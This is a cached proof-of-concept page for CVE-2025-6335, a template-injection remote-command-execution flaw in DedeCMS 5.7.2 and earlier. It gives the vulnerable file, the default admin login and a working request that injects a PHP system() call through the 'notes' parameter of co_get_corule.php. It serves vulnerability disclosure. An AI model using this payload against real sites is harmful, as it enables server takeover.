CVE-2025-6335 PoC — DesDev DedeCMS 注入漏洞

Source

https://github.com/jujubooom/CVE-2025-6335

Associated Vulnerability

Title:DesDev DedeCMS 注入漏洞 (CVE-2025-6335)
Description:DesDev DedeCMS（织梦内容管理系统）是中国卓卓（DesDev）公司的一套基于PHP的开源内容管理系统（CMS）。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 DesDev DedeCMS 5.7.2及之前版本存在注入漏洞，该漏洞源于对文件/include/dedetag.class.php中参数notes的错误操作导致命令注入。

Description

cve报告

Readme

## Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

**BUG_Author:** Ewoji

**Affected Version:**  dedeCMS < 5.7.2

**Vendor:** [Shanghai Zhuozhuo Network Technology Co., LTD](https://www.dedecms.com/)

**Software:** [dedeCMS](https://www.dedecms.com/download#download)

**Vulnerability Files:**
- `/include/dedetag.class.php`

## Description:

1. **After install，Log in to the background**
   - Use the default account password admin/admin

2. **Exploiting the Template**
   - Access the dede/co_get_corule.php interface
   - Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command

3. **Verifying the Exploit:**
   - If the injection is successful,The attacker will execute arbitrary commands

## Proof of Concept:

   ```
   /dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
   Accessing twice like this can execute the command
   ```
detail:[CVE-2025-6335-dedeCMS后台模板注入RCE](https://ewoji.cn/2025/06/20/CVE-2025-6335-dedeCMS%E5%90%8E%E5%8F%B0%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5RCE/)

File Snapshot


 [4.0K]  /data/pocs/ad9b23b9cb5b5ee16a179834209e7985910068e2
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!